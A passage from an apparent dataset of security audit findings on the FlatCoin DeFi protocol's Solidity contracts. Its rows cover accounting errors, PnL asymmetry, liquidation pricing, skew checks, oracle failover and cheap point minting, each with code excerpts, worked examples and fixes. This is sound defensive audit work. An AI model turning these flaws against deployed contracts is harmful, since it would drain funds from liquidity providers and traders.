ETH))\\nstableCollateralTotal = 105 ETH + (15 ETH) = 120 ETH\\n```\\n\\nStableCollateralTotal = 120 ETH\\nDuring Global Position Update:\\nmarginDelta= -(position.marginDeposited + positionSummary.accruedFunding) = -(70 + (-5)) = -65\\nmarginDepositedTotal = 65 + (-65) = 0\\nConclusion:\\nStableCollateralTotal = 120 ETH, marginDepositedTotal = 0 (Total 120 ETH tracked in the system)\\nBalance of collateral in the system = 120 ETH. Thus, both values are in sync. No revert.","The following is a list of potential impacts of this issue:\\nFirst Example: LPs incur unnecessary losses during liquidation, which would be avoidable if the calculations were correctly implemented from the start.\\nSecond Example: An error in the protocol's accounting mechanism led to an inflated increase in the LPs' stable collateral total, which in turn inflated the number of tokens users can withdraw from the system.\\nThird Example: The accounting error led to the tracked balance and actual collateral balance not being in sync.",```\\nsettleFundingFees() = Short/LP need to pay Long 100\\n\\nmarginDepositedTotal = marginDepositedTotal + funding fee\\nmarginDepositedTotal = y + (-100) = (y - 100)\\n\\nstableCollateralTotal = x + (-(-100)) = (x + 100)\\n```\\n +Asymmetry in profit and loss (PnL) calculations,high,"An asymmetry arises in profit and loss (PnL) calculations due to relative price changes. This discrepancy emerges when adjustments to a position lead to differing PnL outcomes despite equivalent absolute price shifts in rETH, leading to loss of assets.\\nScenario 1\\nAssume at $T0$, the price of rETH is $1000. Bob opened a long position with the following state:\\nPosition Size = 40 ETH\\nMargin = $x$ ETH\\nAt $T2$, the price of rETH increased to $2000. Thus, Bob's PnL is as follows: he gains 20 rETH.\\n```\\nPnL = Position Size * Price Shift / Current Price\\nPnL = Position Size * (Current Price - Last Price) / Current Price\\nPnL = 40 rETH * ($2000 - $1000) / $2000\\nPnL = $40000 / $2000 = 20 rETH\\n```\\n\\nImportant Note: In terms of dollars, each ETH earns $1000. Since the position held 40 ETH, the position gained $40000.\\nScenario 2\\nAssume at $T0$, the price of rETH is $1000. Bob opened a long position with the following state:\\nPosition Size = 40 ETH\\nMargin = $x$ ETH\\nAt $T1$, the price of rETH dropped to $500. An adjustment is executed against Bob's long position, and a `newMargin` is computed to account for the PnL accrued till now, as shown in Line 191 below. Thus, Bob's PnL is as follows: he lost 40 rETH.\\n```\\nPnL = Position Size * Price Shift / Current Price\\nPnL = Position Size * (Current Price - Last Price) / Current Price\\nPnL = 40 rETH * ($500 - $1000) / $500\\nPnL = -$20000 / $500 = -40 rETH\\n```\\n\\nAt this point, the position's `marginDeposited` will be $(x - 40)\\ rETH$ and `lastPrice` set to $500.\\nImportant Note 1: In terms of dollars, each ETH lost $500. Since the position held 40 ETH, the position lost $20000\\n```\\nFile: LeverageModule.sol\\n // This accounts for the profit loss and funding fees accrued till now.\\n uint256 newMargin = (marginAdjustment +\\n PerpMath\\n ._getPositionSummary({position: position, nextFundingEntry: cumulativeFunding, price: adjustPrice})\\n .marginAfterSettlement).toUint256();\\n..SNIP..\\n vault.setPosition(\\n FlatcoinStructs.Position({\\n lastPrice: adjustPrice,\\n marginDeposited: newMargin,\\n additionalSize: newAdditionalSize,\\n entryCumulativeFunding: cumulativeFunding\\n }),\\n announcedAdjust.tokenId\\n );\\n```\\n\\nAt $T2$, the price of rETH increases from $500 to $2000. Thus, Bob's PnL is as follows:\\n```\\nPnL = Position Size * Price Shift / Current Price\\nPnL = Position Size * (Current Price - Last Price) / Current Price\\nPnL = 40 rETH * ($2000 - $500) / $500\\nPnL = $60000 / $2000 = 30 rETH\\n```\\n\\nAt this point, the position's `marginDeposited` will be $(x - 40 + 30)\\ rETH$, which is equal to $(x - 10)\\ rETH$. This effectively means that Bob has lost 10 rETH of the total margin he deposited.\\nImportant Note 2: In terms of dollars, each ETH gains $1500. Since the position held 40 ETH, the position gained $60000.\\nImportant Note 3: If we add up the loss of $20000 at 𝑇1 and the gain of $60000 at 𝑇2, the overall PnL is a gain of $40000 at the end.\\nAnalysis\\nThe final PnL of a position should be equivalent regardless of the number of adjustments/position updates made between $T0$ and $T2$. However, the current implementation does not conform to this property. Bob gains 20 rETH in the first scenario, while Bob loses 10 rETH in the second scenario.\\nThere are several reasons that lead to this issue:\\nThe PnL calculation emphasizes relative price changes (percentage) rather than absolute price changes (dollar value). This leads to asymmetric rETH outcomes for the same absolute dollar gains/losses. If we have used the dollar to compute the PnL, both scenarios will return the same correct result, with a gain of $40000 at the end, as shown in the examples above. (Refer to the important note above)\\nThe formula for PnL calculation is sensitive to the proportion of the price change relative to the current price. This causes the rETH gains/losses to be non-linear even when the absolute dollar gains/losses are the same.\\nExtra Example\\nThe current approach to computing the PnL will also cause issues in another area besides the one shown above. The following example aims to demonstrate that it can cause a desync between the PnL accumulated by the global positions AND the PnL of all the individual open positions in the system.\\nThe following shows the two open positions owned by Alice and Bob. The current price of ETH is $1000 and the current time is $T0$\\nAlice's Long Position Bob's Long Position\\nPosition Size = 100 ETH\\nEntry Price = $1000 Position Size = 50 ETH\\nEntry Price = $1000\\nAt $T1$, the price of ETH drops from $1000 to $750, and the `updateGlobalPositionData` function is executed. The `profitLossTotal` is computed as below. Thus, the `marginDepositedTotal` decreased by 50 ETH.\\n```\\npriceShift = $750 - $1000 = -$250\\nprofitLossTotal = (globalPosition.sizeOpenedTotal * priceShift) / price\\nprofitLossTotal = (150 ETH * -$250) / $750 = -50 ETH\\n```\\n\\nAt $T2$, the price of ETH drops from $750 to $500, and the `updateGlobalPositionData` function is executed. The `profitLossTotal` is computed as below. Thus, the `marginDepositedTotal` decreased by 75 ETH.\\n```\\npriceShift = $500 - $750 = -$250\\nprofitLossTotal = (globalPosition.sizeOpenedTotal * priceShift) / price\\nprofitLossTotal = (150 ETH * -$250) / $500 = -75 ETH\\n```\\n\\nIn total, the `marginDepositedTotal` decreased by 125 ETH (50 + 75), which means that the long traders lost 125 ETH from $T0$ to $T2$.\\nHowever, when we compute the loss of Alice and Bob's positions at $T2$, they lost a total of 150 ETH, which deviated from the loss of 125 ETH in the global position data.\\n```\\nAlice's PNL\\npriceShift = current price - entry price = $500 - $1000 = -$500\\nPnL = (position size * priceShift) / current price\\nPnL = (100 ETH * -$500) / $500 = -100 ETH\\n\\nBob's PNL\\npriceShift = current price - entry price = $500 - $1000 = -$500\\nPnL = (position size * priceShift) / current price\\nPnL = (50 ETH * -$500) / $500 = -50 ETH\\n```\\n","Consider tracking the PnL in dollar value/term to ensure consistency between the rETH and dollar representations of gains and losses.\\nAppendix\\nCompared to SNX V2, it is not vulnerable to this issue. The reason is that in SNX V2 when it computes the PnL, it does not ""scale"" down the result by the price. The PnL in SNXv2 is simply computed in dollar value ($positionSize \\times priceShift$), while FlatCoin protocol computes in collateral (rETH) term ($\\frac{positionSize \\times priceShift}{price}$).\\n```\\nfunction _profitLoss(Position memory position, uint price) internal pure returns (int pnl) {\\n int priceShift = int(price).sub(int(position.lastPrice));\\n return int(position.size).multiplyDecimal(priceShift);\\n}\\n```\\n\\n```\\n/*\\n * The initial margin of a position, plus any PnL and funding it has accrued. The resulting value may be negative.\\n */\\nfunction _marginPlusProfitFunding(Position memory position, uint price) internal view returns (int) {\\n int funding = _accruedFunding(position, price);\\n return int(position.margin).add(_profitLoss(position, price)).add(funding);\\n}\\n```\\n","Loss of assets, as demonstrated in the second scenario in the first example above. The tracking of profit and loss, which is the key component within the protocol, both on the position level and global level, is broken.",```\\nPnL = Position Size * Price Shift / Current Price\\nPnL = Position Size * (Current Price - Last Price) / Current Price\\nPnL = 40 rETH * ($2000 - $1000) / $2000\\nPnL = $40000 / $2000 = 20 rETH\\n```\\n +Incorrect price used when updating the global position data,high,"Incorrect price used when updating the global position data leading to a loss of assets for LPs.\\nNear the end of the liquidation process, the `updateGlobalPositionData` function at Line 159 will be executed to update the global position data. However, when executing the `updateGlobalPositionData` function, the code sets the price at Line 160 below to the position's last price (position.lastPrice), which is incorrect. The price should be set to the current price instead, and not the position's last price.\\n```\\nFile: LiquidationModule.sol\\n /// @notice Function to liquidate a position.\\n /// @dev One could directly call this method instead of `liquidate(uint256, bytes[])` if they don't want to update the Pyth price.\\n /// @param tokenId The token ID of the leverage position.\\n function liquidate(uint256 tokenId) public nonReentrant whenNotPaused liquidationInvariantChecks(vault, tokenId) {\\n FlatcoinStructs.Position memory position = vault.getPosition(tokenId);\\n\\n (uint256 currentPrice, ) = IOracleModule(vault.moduleAddress(FlatcoinModuleKeys._ORACLE_MODULE_KEY)).getPrice();\\n\\n // Settle funding fees accrued till now.\\n vault.settleFundingFees();\\n\\n // Check if the position can indeed be liquidated.\\n if (!canLiquidate(tokenId)) revert FlatcoinErrors.CannotLiquidate(tokenId);\\n\\n FlatcoinStructs.PositionSummary memory positionSummary = PerpMath._getPositionSummary(\\n position,\\n vault.cumulativeFundingRate(),\\n currentPrice\\n );\\n..SNIP..\\n vault.updateGlobalPositionData({\\n price: position.lastPrice,\\n marginDelta: -(int256(position.marginDeposited) + positionSummary.accruedFunding),\\n additionalSizeDelta: -int256(position.additionalSize) // Since position is being closed, additionalSizeDelta should be negative.\\n });\\n```\\n\\nThe reason why the `updateGlobalPositionData` function expects a current price to be passed in is that within the `PerpMath._profitLossTotal` function, it will compute the price shift between the current price and the last price to obtain the PnL of all the open positions. Also, per the comment at Line 170 below, it expects the current price of the collateral to be passed in.\\nThus, it is incorrect to pass in the individual position's last/entry price, which is usually the price of the collateral when the position was first opened or adjusted some time ago.\\nThus, if the last/entry price of the liquidated position is higher than the current price of collateral, the PnL will be inflated, indicating more gain for the long traders. Since this is a zero-sum game, this also means that the LP loses more assets than expected due to the inflated gain of the long traders.\\n```\\nFile: FlatcoinVault.sol\\n /// @notice Function to update the global position data.\\n /// @dev This function is only callable by the authorized modules.\\n /// @param _price The current price of the underlying asset.\\n /// @param _marginDelta The change in the margin deposited total.\\n /// @param _additionalSizeDelta The change in the size opened total.\\n function updateGlobalPositionData(\\n uint256 _price,\\n int256 _marginDelta,\\n int256 _additionalSizeDelta\\n ) external onlyAuthorizedModule {\\n // Get the total profit loss and update the margin deposited total.\\n int256 profitLossTotal = PerpMath._profitLossTotal({globalPosition: _globalPositions, price: _price});\\n\\n // Note that technically, even the funding fees should be accounted for when computing the margin deposited total.\\n // However, since the funding fees are settled at the same time as the global position data is updated,\\n // we can ignore the funding fees here.\\n int256 newMarginDepositedTotal = int256(_globalPositions.marginDepositedTotal) + _marginDelta + profitLossTotal;\\n\\n // Check that the sum of margin of all the leverage traders is not negative.\\n // Rounding errors shouldn't result in a negative margin deposited total given that\\n // we are rounding down the profit loss of the position.\\n // If anything, after closing the last position in the system, the `marginDepositedTotal` should can be positive.\\n // The margin may be negative if liquidations are not happening in a timely manner.\\n if (newMarginDepositedTotal < 0) {\\n revert FlatcoinErrors.InsufficientGlobalMargin();\\n }\\n\\n _globalPositions = FlatcoinStructs.GlobalPositions({\\n marginDepositedTotal: uint256(newMarginDepositedTotal),\\n sizeOpenedTotal: (int256(_globalPositions.sizeOpenedTotal) + _additionalSizeDelta).toUint256(),\\n lastPrice: _price\\n });\\n```\\n","Use the current price instead of liquidated position's last price when update the global position data\\n```\\n(uint256 currentPrice, ) = IOracleModule(vault.moduleAddress(FlatcoinModuleKeys._ORACLE_MODULE_KEY)).getPrice();\\n..SNIP..\\nvault.updateGlobalPositionData({\\n// Remove the line below\\n price: position.lastPrice,\\n// Add the line below\\n price: currentPrice, \\n marginDelta: // Remove the line below\\n(int256(position.marginDeposited) // Add the line below\\n positionSummary.accruedFunding),\\n additionalSizeDelta: // Remove the line below\\nint256(position.additionalSize) // Since position is being closed, additionalSizeDelta should be negative.\\n});\\n```\\n",Loss of assets for the LP as mentioned in the above section.,"```\\nFile: LiquidationModule.sol\\n /// @notice Function to liquidate a position.\\n /// @dev One could directly call this method instead of `liquidate(uint256, bytes[])` if they don't want to update the Pyth price.\\n /// @param tokenId The token ID of the leverage position.\\n function liquidate(uint256 tokenId) public nonReentrant whenNotPaused liquidationInvariantChecks(vault, tokenId) {\\n FlatcoinStructs.Position memory position = vault.getPosition(tokenId);\\n\\n (uint256 currentPrice, ) = IOracleModule(vault.moduleAddress(FlatcoinModuleKeys._ORACLE_MODULE_KEY)).getPrice();\\n\\n // Settle funding fees accrued till now.\\n vault.settleFundingFees();\\n\\n // Check if the position can indeed be liquidated.\\n if (!canLiquidate(tokenId)) revert FlatcoinErrors.CannotLiquidate(tokenId);\\n\\n FlatcoinStructs.PositionSummary memory positionSummary = PerpMath._getPositionSummary(\\n position,\\n vault.cumulativeFundingRate(),\\n currentPrice\\n );\\n..SNIP..\\n vault.updateGlobalPositionData({\\n price: position.lastPrice,\\n marginDelta: -(int256(position.marginDeposited) + positionSummary.accruedFunding),\\n additionalSizeDelta: -int256(position.additionalSize) // Since position is being closed, additionalSizeDelta should be negative.\\n });\\n```\\n" +Long trader's deposited margin can be wiped out,high,"Long Trader's deposited margin can be wiped out due to a logic error, leading to a loss of assets.\\n```\\nFile: FlatcoinVault.sol\\n function settleFundingFees() public returns (int256 _fundingFees) {\\n..SNIP..\\n // Calculate the funding fees accrued to the longs.\\n // This will be used to adjust the global margin and collateral amounts.\\n _fundingFees = PerpMath._accruedFundingTotalByLongs(_globalPositions, unrecordedFunding);\\n\\n // In the worst case scenario that the last position which remained open is underwater,\\n // we set the margin deposited total to 0. We don't want to have a negative margin deposited total.\\n _globalPositions.marginDepositedTotal = (int256(_globalPositions.marginDepositedTotal) > _fundingFees)\\n ? uint256(int256(_globalPositions.marginDepositedTotal) + _fundingFees)\\n : 0;\\n\\n _updateStableCollateralTotal(-_fundingFees);\\n```\\n\\nIssue 1\\nAssume that there are two long positions in the system and the `_globalPositions.marginDepositedTotal` is $X$.\\nAssume that the funding fees accrued to the long positions at Line 228 is $Y$. $Y$ is a positive value indicating the overall gain/profit that the long traders received from the LPs.\\nIn this case, the `_globalPositions.marginDepositedTotal` should be set to $(X + Y)$ after taking into consideration the funding fee gain/profit accrued by the long positions.\\nHowever, in this scenario, $X < Y$. Thus, the condition at Line 232 will be evaluated as `false,` and the `_globalPositions.marginDepositedTotal` will be set to zero. This effectively wipes out all the margin collateral deposited by the long traders in the system, and the deposited margin of the long traders is lost.\\nIssue 2\\nThe second issue with the current implementation is that it does not accurately capture scenarios where the addition of `_globalPositions.marginDepositedTotal` and `_fundingFees` result in a negative number. This is because `_fundingFees` could be a large negative number that, when added to `_globalPositions.marginDepositedTotal`, results in a negative total, but the condition at Line 232 above still evaluates as true, resulting in an underflow revert.","If the intention is to ensure that `_globalPositions.marginDepositedTotal` will never become negative, consider summing up $(X + Y)$ first and determine if the result is less than zero. If yes, set the `_globalPositions.marginDepositedTotal` to zero.\\nThe following is the pseudocode:\\n```\\nnewMarginTotal = globalPositions.marginDepositedTota + _fundingFees;\\nglobalPositions.marginDepositedTotal = newMarginTotal > 0 ? uint256(newMarginTotal) : 0;\\n```\\n",Loss of assets for the long traders as mentioned above.,"```\\nFile: FlatcoinVault.sol\\n function settleFundingFees() public returns (int256 _fundingFees) {\\n..SNIP..\\n // Calculate the funding fees accrued to the longs.\\n // This will be used to adjust the global margin and collateral amounts.\\n _fundingFees = PerpMath._accruedFundingTotalByLongs(_globalPositions, unrecordedFunding);\\n\\n // In the worst case scenario that the last position which remained open is underwater,\\n // we set the margin deposited total to 0. We don't want to have a negative margin deposited total.\\n _globalPositions.marginDepositedTotal = (int256(_globalPositions.marginDepositedTotal) > _fundingFees)\\n ? uint256(int256(_globalPositions.marginDepositedTotal) + _fundingFees)\\n : 0;\\n\\n _updateStableCollateralTotal(-_fundingFees);\\n```\\n" +Fees are ignored when checks skew max in Stable Withdrawal / Leverage Open / Leverage Adjust,medium,"Fees are ignored when checks skew max in Stable Withdrawal / Leverage Open / Leverage Adjust.\\nWhen user withdrawal from the stable LP, vault total stable collateral is updated:\\n```\\n vault.updateStableCollateralTotal(-int256(_amountOut));\\n```\\n\\nThen _withdrawFee is calculated and checkSkewMax(...) function is called to ensure that the system will not be too skewed towards longs:\\n```\\n // Apply the withdraw fee if it's not the final withdrawal.\\n _withdrawFee = (stableWithdrawFee * _amountOut) / 1e18;\\n\\n // additionalSkew = 0 because withdrawal was already processed above.\\n vault.checkSkewMax({additionalSkew: 0});\\n```\\n\\nAt the end of the execution, vault collateral is settled again with withdrawFee, keeper receives keeperFee and `(amountOut - totalFee)` amount of collaterals are transferred to the user:\\n```\\n // include the fees here to check for slippage\\n amountOut -= totalFee;\\n\\n if (amountOut < stableWithdraw.minAmountOut)\\n revert FlatcoinErrors.HighSlippage(amountOut, stableWithdraw.minAmountOut);\\n\\n // Settle the collateral\\n vault.updateStableCollateralTotal(int256(withdrawFee)); // pay the withdrawal fee to stable LPs\\n vault.sendCollateral({to: msg.sender, amount: order.keeperFee}); // pay the keeper their fee\\n vault.sendCollateral({to: account, amount: amountOut}); // transfer remaining amount to the trader\\n```\\n\\nThe `totalFee` is composed of keeper fee and withdrawal fee:\\n```\\n uint256 totalFee = order.keeperFee + withdrawFee;\\n```\\n\\nThis means withdrawal fee is still in the vault, however this fee is ignored when checks skew max and protocol may revert on a safe withdrawal. Consider the following scenario:\\nskewFractionMax is `120%` and stableWithdrawFee is 1%;\\nAlice deposits `100` collateral and Bob opens a leverage position with size 100;\\nAt the moment, there is `100` collaterals in the Vault, skew is `0` and skew fraction is 100%;\\nAlice tries to withdraw `16.8` collaterals, withdrawFee is `0.168`, after withdrawal, it is expected that there is `83.368` stable collaterals in the Vault, so skewFraction should be `119.5%`, which is less than skewFractionMax;\\nHowever, the withdrawal will actually fail because when protocol checks skew max, withdrawFee is ignored and the skewFraction turns out to be `120.19%`, which is higher than skewFractionMax.\\nThe same issue may occur when protocol executes a leverage open and leverage adjust, in both executions, tradeFee is ignored when checks skew max.\\nPlease see the test codes:\\n```\\n function test_audit_withdraw_fee_ignored_when_checks_skew_max() public {\\n // skewFractionMax is 120%\\n uint256 skewFractionMax = vaultProxy.skewFractionMax();\\n assertEq(skewFractionMax, 120e16);\\n\\n // withdraw fee is 1%\\n vm.prank(vaultProxy.owner());\\n stableModProxy.setStableWithdrawFee(1e16);\\n\\n uint256 collateralPrice = 1000e8;\\n\\n uint256 depositAmount = 100e18;\\n announceAndExecuteDeposit({\\n traderAccount: alice,\\n keeperAccount: keeper,\\n depositAmount: depositAmount,\\n oraclePrice: collateralPrice,\\n keeperFeeAmount: 0\\n });\\n\\n uint256 additionalSize = 100e18;\\n announceAndExecuteLeverageOpen({\\n traderAccount: bob,\\n keeperAccount: keeper,\\n margin: 50e18,\\n additionalSize: 100e18,\\n oraclePrice: collateralPrice,\\n keeperFeeAmount: 0\\n });\\n\\n // After leverage Open, skew is 0\\n int256 skewAfterLeverageOpen = vaultProxy.getCurrentSkew();\\n assertEq(skewAfterLeverageOpen, 0);\\n // skew fraction is 100%\\n uint256 skewFractionAfterLeverageOpen = getLongSkewFraction();\\n assertEq(skewFractionAfterLeverageOpen, 1e18);\\n\\n // Note: comment out `vault.checkSkewMax({additionalSkew: 0})` and below lines to see the actual skew fraction\\n // Alice withdraws 16.8 collateral\\n // uint256 aliceLpBalance = stableModProxy.balanceOf(alice);\\n // announceAndExecuteWithdraw({\\n // traderAccount: alice, \\n // keeperAccount: keeper, \\n // withdrawAmount: 168e17, \\n // oraclePrice: collateralPrice, \\n // keeperFeeAmount: 0\\n // });\\n\\n // // After withdrawal, the actual skew fraction is 119.9%, less than skewFractionMax\\n // uint256 skewFactionAfterWithdrawal = getLongSkewFraction();\\n // assertEq(skewFactionAfterWithdrawal, 1199501007580846367);\\n\\n // console2.log(WETH.balanceOf(address(vaultProxy)));\\n }\\n```\\n",Include withdrawal fee / trade fee when check skew max.,Protocol may wrongly prevent a Stable Withdrawal / Leverage Open / Leverage Adjust even if the execution is essentially safe.,```\\n vault.updateStableCollateralTotal(-int256(_amountOut));\\n```\\n +"In LeverageModule.executeOpen/executeAdjust, vault.checkSkewMax should be called after updating the global position data",medium,"```\\nFile: flatcoin-v1\\src\\LeverageModule.sol\\n function executeOpen(\\n address _account,\\n address _keeper,\\n FlatcoinStructs.Order calldata _order\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _newTokenId) {\\n// rest of code// rest of code\\n101:-> vault.checkSkewMax({additionalSkew: announcedOpen.additionalSize});\\n\\n {\\n // The margin change is equal to funding fees accrued to longs and the margin deposited by the trader.\\n105:-> vault.updateGlobalPositionData({\\n price: entryPrice,\\n marginDelta: int256(announcedOpen.margin),\\n additionalSizeDelta: int256(announcedOpen.additionalSize)\\n });\\n// rest of code// rest of code\\n }\\n```\\n\\nWhen `profitLossTotal` is positive value, then `stableCollateralTotal` will decrease.\\nWhen `profitLossTotal` is negative value, then `stableCollateralTotal` will increase.\\nAssume the following:\\n```\\nstableCollateralTotal = 90e18\\n_globalPositions = { \\n sizeOpenedTotal: 100e18, \\n lastPrice: 1800e18, \\n}\\nA new position is to be opened with additionalSize = 5e18. \\nfresh price=2000e18\\n```\\n\\nWe explain it in two situations:\\n`checkSkewMax` is called before `updateGlobalPositionData`.\\n```\\nlongSkewFraction = (_globalPositions.sizeOpenedTotal + additionalSize) * 1e18 / stableCollateralTotal \\n = (100e18 + 5e18) * 1e18 / 90e18 \\n = 1.16667e18 < skewFractionMax(1.2e18)\\nso checkSkewMax will be passed.\\n```\\n\\n`checkSkewMax` is called after `updateGlobalPositionData`.\\n```\\nIn updateGlobalPositionData: \\nPerpMath._profitLossTotal calculates\\nprofitLossTotal = _globalPositions.sizeOpenedTotal * (int256(price) - int256(globalPosition.lastPrice)) / int256(price) \\n = 100e18 * (2000e18 - 1800e18) / 2000e18 = 100e18 * 200e18 /2000e18 \\n = 10e18 \\n_updateStableCollateralTotal(-profitLossTotal) will deduct 10e18 from stableCollateralTotal. \\nso stableCollateralTotal = 90e18 - 10e18 = 80e18. \\n\\nNow, checkSkewMax is called: \\nlongSkewFraction = (_globalPositions.sizeOpenedTotal + additionalSize) * 1e18 / stableCollateralTotal \\n = (100e18 + 5e18) * 1e18 / 80e18 \\n = 1.3125e18 > skewFractionMax(1.2e18)\\n```\\n\\nTherefore, this new position should not be allowed to open, as this will only make the system more skewed towards the long side.","```\\nFile: flatcoin-v1\\src\\LeverageModule.sol\\n function executeOpen(\\n address _account,\\n address _keeper,\\n FlatcoinStructs.Order calldata _order\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _newTokenId) {\\n// rest of code// rest of code\\n101:--- vault.checkSkewMax({additionalSkew: announcedOpen.additionalSize});\\n\\n {\\n // The margin change is equal to funding fees accrued to longs and the margin deposited by the trader.\\n vault.updateGlobalPositionData({\\n price: entryPrice,\\n marginDelta: int256(announcedOpen.margin),\\n additionalSizeDelta: int256(announcedOpen.additionalSize)\\n });\\n+++ vault.checkSkewMax(0); //0 means that vault.updateGlobalPositionData has added announcedOpen.additionalSize.\\n// rest of code// rest of code\\n }\\n```\\n","The `stableCollateralTotal` used by `checkSkewMax` is the value of the total profit that has not yet been settled, which is old value. In this way, when the price of collateral rises, it will cause the system to be more skewed towards the long side.","```\\nFile: flatcoin-v1\\src\\LeverageModule.sol\\n function executeOpen(\\n address _account,\\n address _keeper,\\n FlatcoinStructs.Order calldata _order\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _newTokenId) {\\n// rest of code// rest of code\\n101:-> vault.checkSkewMax({additionalSkew: announcedOpen.additionalSize});\\n\\n {\\n // The margin change is equal to funding fees accrued to longs and the margin deposited by the trader.\\n105:-> vault.updateGlobalPositionData({\\n price: entryPrice,\\n marginDelta: int256(announcedOpen.margin),\\n additionalSizeDelta: int256(announcedOpen.additionalSize)\\n });\\n// rest of code// rest of code\\n }\\n```\\n" +Oracle will not failover as expected during liquidation,medium,"Oracle will not failover as expected during liquidation. If the liquidation cannot be executed due to the revert described in the following scenario, underwater positions and bad debt accumulate in the protocol, threatening the solvency of the protocol.\\nThe liquidators have the option to update the Pyth price during liquidation. If the liquidators do not intend to update the Pyth price during liquidation, they have to call the second `liquidate(uint256 tokenId)` function at Line 85 below directly, which does not have the `updatePythPrice` modifier.\\n```\\nFile: LiquidationModule.sol\\n function liquidate(\\n uint256 tokenID,\\n bytes[] calldata priceUpdateData\\n ) external payable whenNotPaused updatePythPrice(vault, msg.sender, priceUpdateData) {\\n liquidate(tokenID);\\n }\\n\\n /// @notice Function to liquidate a position.\\n /// @dev One could directly call this method instead of `liquidate(uint256, bytes[])` if they don't want to update the Pyth price.\\n /// @param tokenId The token ID of the leverage position.\\n function liquidate(uint256 tokenId) public nonReentrant whenNotPaused liquidationInvariantChecks(vault, tokenId) {\\n FlatcoinStructs.Position memory position = vault.getPosition(tokenId);\\n```\\n\\nIt was understood from the protocol team that the rationale for allowing the liquidators to execute a liquidation without updating the Pyth price is to ensure that the liquidations will work regardless of Pyth's working status, in which case Chainlink is the fallback, and the last oracle price will be used for the liquidation.\\nHowever, upon further review, it was found that the fallback mechanism within the FlatCoin protocol does not work as expected by the protocol team.\\nAssume that Pyth is down. In this case, no one would be able to fetch the latest off-chain price from Pyth network and update Pyth on-chain contract. As a result, the prices stored in the Pyth on-chain contract will become outdated and stale.\\nWhen liquidation is executed in FlatCoin protocol, the following `_getPrice` function will be executed to fetch the price. Line 107 below will fetch the latest price from Chainlink, while Line 108 below will fetch the last available price on the Pyth on-chain contract. When the Pyth on-chain prices have not been updated for a period of time, the deviation between `onchainPrice` and `offchainPrice` will widen till a point where `diffPercent > maxDiffPercent` and a revert will occur at Line 113 below, thus blocking the liquidation from being carried out. As a result, the liquidation mechanism within the FlatCoin protocol will stop working.\\nAlso, the protocol team's goal of allowing the liquidators to execute a liquidation without updating the Pyth price to ensure that the liquidations will work regardless of Pyth's working status will not be achieved.\\n```\\nFile: OracleModule.sol\\n /// @notice Returns the latest 18 decimal price of asset from either Pyth.network or Chainlink.\\n /// @dev It verifies the Pyth network price against Chainlink price (ensure that it is within a threshold).\\n /// @return price The latest 18 decimal price of asset.\\n /// @return timestamp The timestamp of the latest price.\\n function _getPrice(uint32 maxAge) internal view returns (uint256 price, uint256 timestamp) {\\n (uint256 onchainPrice, uint256 onchainTime) = _getOnchainPrice(); // will revert if invalid\\n (uint256 offchainPrice, uint256 offchainTime, bool offchainInvalid) = _getOffchainPrice();\\n bool offchain;\\n\\n uint256 priceDiff = (int256(onchainPrice) - int256(offchainPrice)).abs();\\n uint256 diffPercent = (priceDiff * 1e18) / onchainPrice;\\n if (diffPercent > maxDiffPercent) revert FlatcoinErrors.PriceMismatch(diffPercent);\\n\\n if (offchainInvalid == false) {\\n // return the freshest price\\n if (offchainTime >= onchainTime) {\\n price = offchainPrice;\\n timestamp = offchainTime;\\n offchain = true;\\n } else {\\n price = onchainPrice;\\n timestamp = onchainTime;\\n }\\n } else {\\n price = onchainPrice;\\n timestamp = onchainTime;\\n }\\n\\n // Check that the timestamp is within the required age\\n if (maxAge < type(uint32).max && timestamp + maxAge < block.timestamp) {\\n revert FlatcoinErrors.PriceStale(\\n offchain ? FlatcoinErrors.PriceSource.OffChain : FlatcoinErrors.PriceSource.OnChain\\n );\\n }\\n }\\n```\\n",Consider implementing a feature to allow the protocol team to disable the price deviation check so that the protocol team can disable it in the event that Pyth network is down for an extended period of time.,"The liquidation mechanism is the core component of the protocol and is important to the solvency of the protocol. If the liquidation cannot be executed due to the revert described in the above scenario, underwater positions and bad debt accumulate in the protocol threaten the solvency of the protocol.","```\\nFile: LiquidationModule.sol\\n function liquidate(\\n uint256 tokenID,\\n bytes[] calldata priceUpdateData\\n ) external payable whenNotPaused updatePythPrice(vault, msg.sender, priceUpdateData) {\\n liquidate(tokenID);\\n }\\n\\n /// @notice Function to liquidate a position.\\n /// @dev One could directly call this method instead of `liquidate(uint256, bytes[])` if they don't want to update the Pyth price.\\n /// @param tokenId The token ID of the leverage position.\\n function liquidate(uint256 tokenId) public nonReentrant whenNotPaused liquidationInvariantChecks(vault, tokenId) {\\n FlatcoinStructs.Position memory position = vault.getPosition(tokenId);\\n```\\n" +Large amounts of points can be minted virtually without any cost,medium,"Large amounts of points can be minted virtually without any cost. The points are intended to be used to exchange something of value. A malicious user could abuse this to obtain a large number of points, which could obtain excessive value and create unfairness among other protocol users.\\nWhen depositing stable collateral, the LPs only need to pay for the keeper fee. The keeper fee will be sent to the caller who executed the deposit order.\\nWhen withdrawing stable collateral, the LPs need to pay for the keeper fee and withdraw fee. However, there is an instance where one does not need to pay for the withdrawal fee. Per the condition at Line 120 below, if the `totalSupply` is zero, this means that it is the final/last withdrawal. In this case, the withdraw fee will not be applicable and remain at zero.\\n```\\nFile: StableModule.sol\\n function executeWithdraw(\\n address _account,\\n uint64 _executableAtTime,\\n FlatcoinStructs.AnnouncedStableWithdraw calldata _announcedWithdraw\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _amountOut, uint256 _withdrawFee) {\\n uint256 withdrawAmount = _announcedWithdraw.withdrawAmount;\\n..SNIP..\\n _burn(_account, withdrawAmount);\\n..SNIP..\\n // Check that there is no significant impact on stable token price.\\n // This should never happen and means that too much value or not enough value was withdrawn.\\n if (totalSupply() > 0) {\\n if (\\n stableCollateralPerShareAfter < stableCollateralPerShareBefore - 1e6 ||\\n stableCollateralPerShareAfter > stableCollateralPerShareBefore + 1e6\\n ) revert FlatcoinErrors.PriceImpactDuringWithdraw();\\n\\n // Apply the withdraw fee if it's not the final withdrawal.\\n _withdrawFee = (stableWithdrawFee * _amountOut) / 1e18;\\n\\n // additionalSkew = 0 because withdrawal was already processed above.\\n vault.checkSkewMax({additionalSkew: 0});\\n } else {\\n // Need to check there are no longs open before allowing full system withdrawal.\\n uint256 sizeOpenedTotal = vault.getVaultSummary().globalPositions.sizeOpenedTotal;\\n\\n if (sizeOpenedTotal != 0) revert FlatcoinErrors.MaxSkewReached(sizeOpenedTotal);\\n if (stableCollateralPerShareAfter != 1e18) revert 